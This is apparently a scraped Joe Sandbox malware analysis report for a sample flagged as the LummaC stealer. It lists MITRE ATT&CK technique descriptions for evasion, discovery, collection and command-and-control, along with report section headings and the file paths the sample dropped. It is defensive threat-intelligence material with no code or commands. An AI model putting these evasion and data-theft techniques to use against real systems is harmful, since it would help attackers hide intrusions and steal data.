Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 57lklPjdPc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\57lklPjdPc.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\l6E.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uxob3w4.hf5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrntmms3.3fe.psm1

C:\Users\user\AppData\Roaming\57lklPjdPc.exe

C:\Users\user\AppData\Roaming\l6E.exe

\Device\Null

Static File Info

General

Windows Analysis Report
57lklPjdPc.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre